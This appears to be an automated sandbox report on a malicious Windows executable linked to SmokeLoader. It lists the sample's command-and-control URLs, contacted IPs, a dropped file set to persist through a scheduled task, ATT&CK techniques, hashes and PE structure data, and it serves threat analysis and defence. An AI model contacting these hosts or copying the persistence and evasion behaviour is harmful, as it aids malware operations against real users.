Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	12 Virtualization/Sandbox Evasion	LSASS Memory	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	Data from Removable Media	2 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	32 Process Injection	Security Account Manager	3 Process Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	112 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Hidden Files and Directories	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	Protocol Impersonation	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	12 Software Packing	Cached Domain Credentials	12 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 File Deletion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
PSyWSlhDa5.exe	41%	ReversingLabs
PSyWSlhDa5.exe	100%	Avira	HEUR/AGEN.1306958
PSyWSlhDa5.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\jhfrihr	100%	Avira	HEUR/AGEN.1306958
C:\Users\user\AppData\Roaming\jhfrihr	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\jhfrihr	41%	ReversingLabs

Source	Detection	Scanner	Label
https://api.msn.com/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://word.office.com	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
https://outlook.com	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	0%	URL Reputation	safe
https://api.msn.com/	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
tnc-corp.ru	58.151.148.90	true	true	unknown
volisc.biz	unknown	unknown	true	unknown
liverds.at	unknown	unknown	true	unknown
livbev.online	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Reputation
http://volisc.biz/tmp/index.php	true	unknown
http://liverds.at/tmp/index.php	true	unknown
http://tnc-corp.ru/tmp/index.php	true	unknown
http://livbev.online/tmp/index.php	true	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000009.00000000.1347657847.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://word.office.com	explorer.exe, 00000009.00000000.1349722962.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/music/news/6-rock-ballads-that-tug-at-the-heartstrings/ar-AA1hIdsm	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.pollensense.com/	explorer.exe, 00000009.00000000.1345524698.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com:443/v1/news/Feed/Windows?t	explorer.exe, 00000009.00000000.1345524698.0000000007276000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/sports/other/simone-biles-leads-u-s-women-s-team-to-seventh-straight-world	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/weather/topstories/here-s-who-could-see-above-average-snowfall-this-winter	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehwh2.svg	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://powerpoint.office.com	explorer.exe, 00000009.00000000.1349722962.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://excel.office.com	explorer.exe, 00000009.00000000.1349722962.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/realestate/why-this-florida-city-is-a-safe-haven-from-hurricanes/ar-	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://www.foreca.com	explorer.exe, 00000009.00000000.1345524698.00000000071B2000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		unknown
http://schemas.micro	explorer.exe, 00000009.00000000.1346635432.0000000007C70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1347347298.0000000008810000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000009.00000000.1347362473.0000000008820000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://outlook.com	explorer.exe, 00000009.00000000.1349722962.000000000C091000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000009.00000000.1347657847.000000000913F000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp	explorer.exe, 00000009.00000000.1347657847.0000000008F83000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com/en-us/money/markets/costco-is-seeing-a-gold-rush-what-s-behind-the-demand-for-it	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=DD4083B70FE54739AB05D6BBA3484042&timeOut=5000&oc	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://api.msn.com/	explorer.exe, 00000009.00000000.1347657847.0000000008F09000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://wns.windows.com/	explorer.exe, 00000009.00000000.1347657847.00000000090F2000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV-dark	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.msn.com:443/en-us/feed	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		unknown
https://www.msn.com/en-us/weather/topstories/accuweather-el-ni	explorer.exe, 00000009.00000000.1345524698.00000000071FC000.00000004.00000001.00020000.00000000.sdmp	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
197.164.156.210	unknown	Egypt		24863	LINKdotNET-ASEG	true
58.151.148.90	tnc-corp.ru	Korea Republic of		17858	POWERVIS-AS-KRLGPOWERCOMMKR	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1537115
Start date and time:	2024-10-18 15:21:05 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 50s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	16
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	PSyWSlhDa5.exe renamed because original name is a hash value
Original Sample Name:	ddea2e8fdf71f225d8edebe0034e589f.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@2/2@81/2
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 100% Number of executed functions: 28 Number of non-executed functions: 5
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
Excluded domains from analysis (whitelisted): 6.0.1.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.0.7.0.0.0.0.3.0.1.3.0.6.2.ip6.arpa, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size getting too big, too many NtEnumerateKey calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
VT rate limit hit for: PSyWSlhDa5.exe

Simulations

Behavior and APIs

Time	Type	Description
09:22:22	API Interceptor	383919x Sleep call for process: explorer.exe modified
17:12:41	Task Scheduler	Run new task: Firefox Default Browser Agent 45EB0492026089AE path: C:\Users\user\AppData\Roaming\jhfrihr

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
197.164.156.210	LKpIHL2abO.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	064c59b3a8b03e6c733f88483fd675d99bc805399c55d4a1a7b613aa20d08de8_dump.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	yosoborno.com/tmp/
	vXYIP6U4db.exe	Get hash	malicious	LummaC, Go Injector, LummaC Stealer, SmokeLoader	Browse	yosoborno.com/tmp/
58.151.148.90	1HGXcC63iu.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	veEGy9FijY.exe	Get hash	malicious	SmokeLoader	Browse	nwgrus.ru/tmp/index.php
	oRKal761Qm.exe	Get hash	malicious	LummaC, Go Injector, SmokeLoader	Browse	100xmargin.com/tmp/index.php
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	cajgtus.com/test1/get.php?pid=F8AFCDC4E800A3319FFB343E83099637
	n72I7qB2ss.exe	Get hash	malicious	SmokeLoader	Browse	mzxn.ru/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	cOm0MmeV34.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	file.exe	Get hash	malicious	SmokeLoader	Browse	gebeus.ru/tmp/index.php
	file.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	gebeus.ru/tmp/index.php
	2gQsoHaGEm.exe	Get hash	malicious	LummaC, CryptOne, LummaC Stealer, SmokeLoader, Vidar	Browse	dbfhns.in/tmp/index.php

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
tnc-corp.ru	wxy6cQKIqG.exe	Get hash	malicious	SmokeLoader	Browse	211.171.233.126
	H3CVATCJSD.exe	Get hash	malicious	SmokeLoader	Browse	211.181.24.132
	Y0KE01P97o.exe	Get hash	malicious	SmokeLoader	Browse	187.199.203.72
	cmdkdOPiL0.exe	Get hash	malicious	SmokeLoader	Browse	187.199.203.72
	n2vzjwEC9r.exe	Get hash	malicious	SmokeLoader	Browse	190.98.23.157
	RiXx9V0T36.exe	Get hash	malicious	SmokeLoader	Browse	185.18.245.58
	uMYGpA8fiI.exe	Get hash	malicious	SmokeLoader	Browse	105.197.97.247
	file.exe	Get hash	malicious	SmokeLoader	Browse	190.218.17.143
	t3TkmcMmcA.exe	Get hash	malicious	SmokeLoader	Browse	211.253.81.139
	XXT4sOOJjk.exe	Get hash	malicious	SmokeLoader	Browse	63.143.98.185

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
POWERVIS-AS-KRLGPOWERCOMMKR	Q137zuCNxh.elf	Get hash	malicious	Mirai	Browse	180.226.45.115
	botnet.arm5.elf	Get hash	malicious	Mirai, Moobot	Browse	112.149.0.133
	botnet.arm7.elf	Get hash	malicious	Mirai, Moobot	Browse	182.208.92.230
	powerpc.elf	Get hash	malicious	Unknown	Browse	182.221.119.8
	spc.elf	Get hash	malicious	Mirai	Browse	119.65.100.162
	sh4.elf	Get hash	malicious	Mirai	Browse	116.47.123.77
	arm.elf	Get hash	malicious	Mirai	Browse	125.184.79.111
	armv7l.elf	Get hash	malicious	Unknown	Browse	116.33.85.204
	armv7l.elf	Get hash	malicious	Unknown	Browse	14.5.182.70
	sparc.elf	Get hash	malicious	Mirai	Browse	182.208.172.85
LINKdotNET-ASEG	m68k.elf	Get hash	malicious	Unknown	Browse	197.163.185.231
	m68k.elf	Get hash	malicious	Mirai	Browse	41.179.108.71
	9VYj30NGgB.elf	Get hash	malicious	Mirai	Browse	41.178.13.101
	h3G4uG7Kqi.elf	Get hash	malicious	Mirai	Browse	197.160.244.197
	Q6gqt5HiOS.elf	Get hash	malicious	Mirai	Browse	197.166.142.59
	JFX7sO1HHj.elf	Get hash	malicious	Mirai	Browse	197.166.191.11
	9zldYT23H2.elf	Get hash	malicious	Mirai, Gafgyt	Browse	45.244.195.38
	VysS7K9PPz.elf	Get hash	malicious	Mirai	Browse	197.165.56.20
	PnjGB63sit.elf	Get hash	malicious	Mirai	Browse	41.178.13.117
	siU9XhyR5f.elf	Get hash	malicious	Mirai	Browse	197.165.56.38

Process:	C:\Windows\explorer.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	431616
Entropy (8bit):	6.375707231166379
Encrypted:	false
SSDEEP:	6144:C9L6WkBljkkvOqysCusnDXebpcOB3FyxMfb9ObhzQ5D/7sFj5:22WkBdhvOfuK+p/B3FyGbUbhQ5M
MD5:	DDEA2E8FDF71F225D8EDEBE0034E589F
SHA1:	B8C92917F1FE79D3595C7CDCD4C157EAE69C7BA6
SHA-256:	5E76223B4EC53240790DBDB1A2937774F48094711EE0CF2A5906FFD8E727E519
SHA-512:	A924639DE2B707D8E1ABA9B7B5C1B2AA0CCCB6E5E03513724CC0DD3049EBDC295D09B655F3FDB2C920DE15A3847DF99DED5E4A241AF22D42EF43D61C88E3CB7E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 41%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n...............].......].......].......................].......].......]......Rich....................PE..L.....Id.................J...........5.......`....@.........................................................................O..d............................p.......................................%..@............................................text...nI.......J.................. ..`.data........`...\...N..............@....koroc.......p......................@..@.jok................................@..@.bit................................@..@.rsrc...............................@..@.reloc..,....p......................@..B................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\jhfrihr:Zone.Identifier

Download File

Process:	C:\Windows\explorer.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Reputation:	high, very likely benign file
Preview:	[ZoneTransfer]....ZoneId=0

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.375707231166379
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	PSyWSlhDa5.exe
File size:	431'616 bytes
MD5:	ddea2e8fdf71f225d8edebe0034e589f
SHA1:	b8c92917f1fe79d3595c7cdcd4c157eae69c7ba6
SHA256:	5e76223b4ec53240790dbdb1a2937774f48094711ee0cf2a5906ffd8e727e519
SHA512:	a924639de2b707d8e1aba9b7b5c1b2aa0cccb6e5e03513724cc0dd3049ebdc295d09b655f3fdb2c920de15a3847df99ded5e4a241af22d42ef43d61c88e3cb7e
SSDEEP:	6144:C9L6WkBljkkvOqysCusnDXebpcOB3FyxMfb9ObhzQ5D/7sFj5:22WkBdhvOfuK+p/B3FyGbUbhQ5M
TLSH:	4994BF2293D1BE55EA158631CD2EC6EC372EF9708E29776E3A187A5F19703B1D163320
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........n...............].......].......].......................].......].......]......Rich....................PE..L.....Id...........

File Icon


Icon Hash:	512545454145610d

Static PE Info

General

Entrypoint:	0x4035e8
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x6449E319 [Thu Apr 27 02:51:05 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	1d1777ac2454d7aeb3037f82cfc93179

Entrypoint Preview

Instruction
call 00007FE254BCB014h
jmp 00007FE254BC8F9Eh
mov edi, edi
push ebp
mov ebp, esp
push edi
mov edi, 000003E8h
push edi
call dword ptr [004010ECh]
push dword ptr [ebp+08h]
call dword ptr [004010E8h]
add edi, 000003E8h
cmp edi, 0000EA60h
jnbe 00007FE254BC9126h
test eax, eax
je 00007FE254BC9100h
pop edi
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
call 00007FE254BC9860h
push dword ptr [ebp+08h]
call 00007FE254BC96ADh
push dword ptr [00446014h]
call 00007FE254BCA883h
push 000000FFh
call eax
add esp, 0Ch
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push 0040121Ch
call dword ptr [004010E8h]
test eax, eax
je 00007FE254BC9137h
push 0040120Ch
push eax
call dword ptr [0040108Ch]
test eax, eax
je 00007FE254BC9127h
push dword ptr [ebp+08h]
call eax
pop ebp
ret
mov edi, edi
push ebp
mov ebp, esp
push dword ptr [ebp+08h]
call 00007FE254BC90EDh
pop ecx
push dword ptr [ebp+08h]
call dword ptr [004010F0h]
int3
push 00000008h
call 00007FE254BCB17Eh
pop ecx
ret
push 00000008h
call 00007FE254BCB09Bh
pop ecx
ret
mov edi, edi
push ebp
mov ebp, esp
push esi
mov esi, eax
jmp 00007FE254BC912Dh
mov eax, dword ptr [esi]
test eax, eax
je 00007FE254BC9124h

Rich Headers

Programming Language:

[C++] VS2008 build 21022
[ASM] VS2008 build 21022
[ C ] VS2008 build 21022
[IMP] VS2005 build 50727
[RES] VS2008 build 21022
[LNK] VS2008 build 21022

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x44f8c	0x64	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5a000	0x1cdf8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x77000	0x90c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x25b8	0x40	.text
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x1ac	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x4496e	0x44a00	2046524d6c574fbc325882c0ec084661	False	0.7410348360655737	data	7.014802365198634	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0x46000	0x10598	0x5c00	bbdfc8579597f28fd5526788ce0a4c5d	False	0.07935631793478261	Matlab v4 mat-file (little endian) \2508@, rows 0, columns 0	0.9317765165292942	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.koroc	0x57000	0x400	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.jok	0x58000	0xd6	0x200	bf619eac0cdf3f68d496ea9344137e8b	False	0.02734375	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bit	0x59000	0x39b	0x400	0f343b0931126a20f133d67c2b018a3b	False	0.0166015625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x5a000	0x1cdf8	0x1ce00	8fae20498fda27e17852e3ca049457f9	False	0.445211038961039	data	4.994172807973204	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x77000	0x132c	0x1400	6e998cbc2813e98f71c6e26f3bdb2d6c	False	0.3935546875	data	3.838569441884552	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0x73da8	0x330	Device independent bitmap graphic, 48 x 96 x 1, image size 0			0.1948529411764706
RT_CURSOR	0x740d8	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.33223684210526316
RT_CURSOR	0x74230	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0			0.2953091684434968
RT_CURSOR	0x750d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0			0.46705776173285196
RT_CURSOR	0x75980	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0			0.5361271676300579
RT_CURSOR	0x75f18	0x130	Device independent bitmap graphic, 32 x 64 x 1, image size 0			0.4375
RT_CURSOR	0x76048	0xb0	Device independent bitmap graphic, 16 x 32 x 1, image size 0			0.44886363636363635
RT_ICON	0x5aa30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.5650319829424307
RT_ICON	0x5aa30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.5650319829424307
RT_ICON	0x5b8d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.5496389891696751
RT_ICON	0x5b8d8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.5496389891696751
RT_ICON	0x5c180	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	India	0.6184971098265896
RT_ICON	0x5c180	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	Tamil	Sri Lanka	0.6184971098265896
RT_ICON	0x5c6e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	India	0.46296680497925313
RT_ICON	0x5c6e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	Tamil	Sri Lanka	0.46296680497925313
RT_ICON	0x5ec90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	India	0.4852251407129456
RT_ICON	0x5ec90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	Tamil	Sri Lanka	0.4852251407129456
RT_ICON	0x5fd38	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	India	0.4926229508196721
RT_ICON	0x5fd38	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 0	Tamil	Sri Lanka	0.4926229508196721
RT_ICON	0x606c0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	India	0.449468085106383
RT_ICON	0x606c0	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	Tamil	Sri Lanka	0.449468085106383
RT_ICON	0x60b90	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	India	0.3795309168443497
RT_ICON	0x60b90	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	Tamil	Sri Lanka	0.3795309168443497
RT_ICON	0x61a38	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	India	0.5049638989169675
RT_ICON	0x61a38	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	Tamil	Sri Lanka	0.5049638989169675
RT_ICON	0x622e0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	India	0.5616359447004609
RT_ICON	0x622e0	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 0	Tamil	Sri Lanka	0.5616359447004609
